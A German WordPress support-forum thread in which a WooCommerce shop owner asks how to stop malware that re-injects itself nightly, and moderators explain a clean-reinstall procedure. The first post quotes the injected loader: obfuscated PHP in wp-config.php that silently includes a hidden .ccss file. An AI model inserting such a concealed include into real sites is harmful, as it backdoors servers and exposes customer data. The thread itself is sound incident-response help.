Support » WooCommerce » Malware in Datenbank und Systemdateien – Langfristige Lösung gesucht

  • Gelöst brixjust4me

    (@brixjust4me)


    In meinem letzten erstellten Topic hatte ich einige Probleme mit meiner WordPress-Seite, unter anderem ein niemals endendes Rädchen beim Checkout im Shop. Dieses Topic konnte nun letztendlich gelöst werden, da sich herausstellte, dass sich in meinen Dateien Malware befand. So, soweit so gut.

    Nun habe ich mich damals hingesetzt und in mühevollster Kleinstarbeit alle Ordner durchforstet. Alles was nicht da hin gehörte kam in die Tonne, es waren über 200 Dateien pro Seite (zwei Seiten in einer Datenbank/auf dem gleichen Server). Die ganze Suche dauerte mehr als 2 Stunden und danach lief alles wieder absolut top. Alle Plugins, Themes etc. sind geupdated, kann ja nix mehr schief gehen! Oder?

    Naja, wie das halt so ist: Die Dateien kommen immer wieder. Jeden Morgen zwischen 1:00 und 3:30 Uhr werden neue Dateien geschrieben und bestehende wie die wp-config.php oder die load.php umgeschrieben und ein Befehl mit eingefügt, der sofort wieder zum stoppen des Checkouts führt. Hier ein Beispiel der Codezeilen aus der wp-config:

    /*4ad01*/
    
    $rp2s
    =
    "/var/www/vhosts/brixxysho\x70.com/schuschel.de/w\x70\x2dincludes/blocks/\x7
    lost\x2dfeatured\x2dimage/.5e56ca46.ccss";$txf7
    =
    str_repeat ($rp2s, 1) ;
    @include once /* 73j */ ($txf7) ;
    
    /*4ad01*/

    Diese Zeilen werden nach der ersten Zeile eingefügt. Infos zum enthaltenen Link: meine Datenbank heißt „brixxyshop“, warum da „brixxysho“ steht, weiß ich nicht. „Schuschel.de“ ist die zweite Seite in der Datenbank/auf dem Server, diese ist ebenfalls mit betroffen, der Code hier stammt aus der wp-config dieser schuschel-Seite, ist aber genauso nur mit meiner Seite in meiner config jeden Morgen drin.

    Und das ist auch genau der Punkt: Ich sitze nun jeden Morgen 10 Minuten in den Dateien und lösche alle Änderungen, die an dem Tag gemacht wurden, damit meine Seite für den Tag wieder läuft. Demnach meine Frage: Welche Möglichkeiten habe ich, damit ich alle Dateien tatsächlich komplett lösche und nicht immer noch eine Backdoor zum neuen erstellen jeden Tag bleibt? Gibt es ein kostenloses Programm dafür oder wie gehe ich da am besten ran?

    Neu aufsetzen würde ich meine Seite ungern, da ja auch Kundendaten, Bestellungen und Produkte auf der Seite gespeichert sind, die so alle verschwinden würden.

    Vielen Dank für die Unterstützung!

    Patrick

    • Dieses Thema wurde geändert vor 1 Monat von Michi91. Grund: Moderation: URL entfernt, da möglicherweise Malware verteilt wird
Ansicht von 6 Antworten - 1 bis 6 (von insgesamt 6)
  • Moderator Michi91

    (@michi91)

    Wenn dort persönliche Daten lagern, solltest du dich an einen Profi wenden! Ich als Endkunde wäre nicht amüsiert wenn man Daten im Darkweb landen.

    Ansonsten stellt sich folgende Frage: weist du schon wie die Hacker eindringen konnten? Es ist ja schön wenn man den Code bereinigt, aber wenn die Lücke noch offen ist, wird sich immer wieder eine neue Malware einnisten.

    Gib uns mal eine Liste deiner Plugins und den Namen des Themes. Gibt es weitere Admin User ausser dich? Oder User mit strangen Userrollen?

    Thread-Starter brixjust4me

    (@brixjust4me)

    Hallo und vielen Dank für die Unterstützung!

    Es lagern zum Glück keine Zahlungsdaten etc. bei uns, sondern nur Versanddaten.

    Kann ich leider nicht sagen, ich vermute dass das vor einer Weile durch ein veraltetes Plugin oder Theme kam, also irgendwo eine Stelle war, die ein Eindringen ermöglichte. Ich hatte das Problem vor ca 6 Monaten schon einmal, da konnte aber alles relativ fix mit einem Zurückrollen auf ein Backup von vor ein paar Tagen gelöst werden. Das war hier nun so nicht möglich, weil alleine die Feststellung woran es lag zu lange gedauert hat. Plugins und Themes sind alle mittlerweile Up2Date, hier eine Liste:

    • Backup-Migration
    • Cache Enabler
    • Collapse-O-Matic
    • Coupon Free Product
    • Elementor
    • Envato Elements
    • Flexible Shipping
    • Germanized
    • Hover Effects
    • Jetpack
    • Ocean EExtra
    • Ocean Stick Anything
    • Tank Math SEO
    • Real Cookie Banner (Free)
    • Tabs Responsive
    • WooCommerce
    • WooCommerce Deutsche Post Internetmarke
    • WooCommerce PDDF-Rechnungen, Lieferscheine, Lieferscheine und Versandetiketten
    • WooPayments
    • Wordfence Security
    • WP Rollback (deaktiviert)
    • WP Staging WordPress Backup Plugin
    • WP-Dateimanager
    • Theme: OceanWP

    Außer mir gibt es noch zwei weitere Admins, von mir festgelegt. Die Passwörter haben wir alle innerhalb der letzten Woche noch einmal erneuert, damit da keine Möglichkeit der Manipulation besteht. Der Rest der Benutzer sind die Kunden, diese haben keine Rechte.

    Zwischenzeitlich waren andere Admins auf der zweiten Seite angelegt (nicht von uns), diese haben wir direkt entfernt. Diese Admin-Accounts haben hauptsächlich Kommentare unter WordPress-Beiträgen freigegeben. Das übliche mit den Links zu Phishing-Websites etc. Mittlerweile ist das Problem aber behoben, keine weiteren Nutzer wurden automatisch angelegt. Die zweite Seite lag für eine lange Zeit brach, somit ist es nicht unwahrscheinlich dass der Ursprung dort liegt. Auch dort haben wir Allee Themes etc. geupdated und alle Dateien gelöscht. Hier die Liste der dort installierten Plugins und des benutzen Themes:

    • Akismet Anti-Spam: Spam Protection (deaktiviert)
    • Cache Enabler (deaktiviert)
    • Contact Form 7 (deaktiviert)
    • Elementor
    • Royal Elementar Addons (deaktiviert)
    • WP Reset
    • WP Dateimanager
    • Theme: Royal Elementar Kit

    Besteht die Möglichkeit, dass die Malware, welche sich bereits in der Seite versteckt neue Dateien selbst schreibt? Oder muss da ein Zugang von außen offen sein (Also durch Plugin etc.)?

    Moderator Hans-Gerd Gerhards

    (@hage)

    Hallo,
    schau mal bitte in den Beitrag aus unserer FAQ: https://de.wordpress.org/support/topic/seite-gehacked-was-tun/

    Das Thema wird auch schon mal bei WordPress Meetups angesprochen, z. B. beim nächsten WordPress Meetup Südsauerland: https://wpmeetup-suedsauerland.de/wordpress-meetup-suedsauerland-6-sicherheit-und-wordpress/

    Viele Grüße
    Hans-Gerd

    Moderator Michi91

    (@michi91)

    Besteht die Möglichkeit, dass die Malware, welche sich bereits in der Seite versteckt neue Dateien selbst schreibt

    Ja, es besteht sogar die Möglichkeit, dass die permanent in Arbeitsspeicher rumgeistern (die Malware ruft sich dazu einfach im Loop selbst auf und erstellt so durchgehen Dateien) , das habe ich aber erst zweimal gesehen.

    Die Malware findet sich in 99% in .php Dateien. Ganz selten auch in JS.

    Ich mache es immer so:

    • Per htaccess den Zugriff so einschränken, dass nur noch meine IP zugreifen kann (so verhindere ich das während meines cleanups schon erneut infiziert wird
    • Backup auf meinen PC
    • Alles vom webspace löschen
    • Kopie vom Backup auf meinem PC in separaten Ordner
    • In diesem Ordner alles löschen ausser wp-content. Im wp-content den Themes und den Plugins Ordner löschen.
    • Mit der Windows/Linux Suche schauen ob trotzdem noch php Dateien vorhanden sind, diese ggf. Löschen
    • WordPress, Plugins und Themes aus dem Internet herunterladen und in die passende Ordner entpacken
    • Neue wp-config.php anlegen
    • Alles hochladen

    Und wie vorher schon erwähnt, per phpmyadmin schauen ob Rollen und Benutzer tatsächlich passen.

    Thread-Starter brixjust4me

    (@brixjust4me)

    Nun ist es eine Woche her und ich melde mich noch einmal um das Thema vielleicht auch für die Nächsten abschließen zu können.

    Es hat alles geklappt. Ich habe mir die Artikel die ihr verlinkt habt durchgelesen, selbst noch ein wenig recherchiert über den Zusammenhang der Datenbanken und nachdem ich nur sehr wenig verstanden habe… habe ich einfach den Rat von Michi91 befolgt!

    Bei mir konnte ich den Down- und Upload umgehen, indem ich die Dateien auf Plesk in neue Ordner verschoben und dort den CleanUp vollzogen habe. Ablauf war wie folgt:

    1. Neuen Ordner mit wildem Namen erstellen, damit man ihn nicht verwechselt.
    2. Frisches WordPress von der WordPress-Seite runterladen und in den neuen Ordner hochladen (letzteres dauert EWIG… auch wenn es nur wenige MB sind)
    3. Aus meinem originalen Seiten-Ordner alles aus dem wp-content-Ordner außer Plugins und Themes in den neuen Ordner an die gleiche Stelle kopieren und den vorhandenen (Roh-)Inhalt ersetzen
    4. Aus meiner langen Liste an Plugins die wichtigsten 5 raussuchen (WooCommerce etc), diese jeweils von der WordPress Plugin-Seite herunterladen und dann in den Plugins-Ordner laden (EEEEEEWIG)
    5. Das gleiche auch mit dem Theme in den Theme-Ordner
    6. Alles aus meinem Original-Ordner (der hinter der Seite liegt) in den Papierkorb legen
    7. Den Inhalt des neuen Ordners in den Original-Ordner kopieren
    8. Fertig!

    Zu Anfang kam es noch zu Permalink-Problemen. Also wenn man auf der Seite im Frontend auf irgendwas geklickt hat, kam die Fehlermeldung „404 Serverfehler, Seite konnte nicht gefunden werden“ – bei jedem Link oder Produkt. Dies konnte gelöst werden, indem wir bei einem einzigen random Produkt und bei jeder einzelnen Seite (Warenkorb, Impressum, AGB, etc.) einmal im Backend auf „Aktualisieren“ geklickt haben (ohne einen Seiteninhalt zu ändern). Dadurch wurde der Link neu verknüpft und die Seite lief im Frontend wie davor.

    Alle Seiteninhalte, Produkte, Bilder, Bestellungen, Kunden und Kommentare, sowie Einstellungen wurden ALLE mit übernommen. Ich weiß, klingt für einen Profi absolut normal, aber für mich als Noob… ich hab mich einfach nur gefreut 😀

    Ich habe danach noch einmal Sucuri scannen lassen, jede Spur von veränderten Dateien ist weg, die Seite läuft wie am ersten Tag!

    Vielen vielen Dank für die Hilfe!!! Ich hoffe ich werde diesen Artikel nicht noch einmal brauchen 🙂

    Danke für das Feedback.

    Hört sich so an, als wäre das Problem für dich damit gelöst? Ich markiere den Thread entsprechend und wenn dir noch etwas einfällt, meldest du dich bitte wieder.

Ansicht von 6 Antworten - 1 bis 6 (von insgesamt 6)